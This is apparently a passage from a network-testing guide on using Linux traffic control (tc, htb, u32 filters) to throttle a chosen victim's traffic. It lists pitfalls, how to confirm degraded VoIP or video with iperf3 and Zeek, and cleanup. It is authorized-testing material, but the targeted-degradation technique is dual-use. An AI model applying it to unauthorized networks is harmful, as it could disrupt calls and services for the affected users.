Do not use on production networks without authorization and a maintenance window, for causing denial-of-service conditions, or against critical infrastructure without safety controls.
Most Often Missed & How to Confirm
Direction of the qdisc:tc shapes egress only on the interface it's attached to. Throttling traffic toward a victim requires the rule on the attacker's forwarding interface, or an ifb/ingress redirect for inbound. A rule on the wrong interface looks like "no effect."
Baseline before and after: without a pre-throttle iperf3 -c <t> -u -b 100M baseline (bandwidth, jitter, loss) you cannot prove degradation. Re-measure during each phase, not just at the end.
Per-flow filters skipped: a blanket tbf hits all traffic including your own SSH/management session. Use htb classes with a u32 match ip dst filter to target only the victim and avoid self-DoS.
TCP vs UDP and codec floors: TCP backs off and hides loss; test UDP for VoIP/video. G.711 needs ~87 Kbps, so throttling to 1 Mbps may show "no impact" on a TCP test yet destroy a call.
How to confirm it worked:tc -s qdisc show dev eth0 must show a rising dropped/overlimits counter, and iperf3 throughput must fall toward the configured rate. A Zeek conn.log bytes/duration collapse confirms it on the wire.
Don't conclude "QoS mitigated it" until you verify the priority queue actually prioritized DSCP EF traffic, not just that bandwidth recovered after you removed the rule.
Cleanup is part of the test:tc qdisc del dev eth0 root — a left-over qdisc silently throttles the next tester.
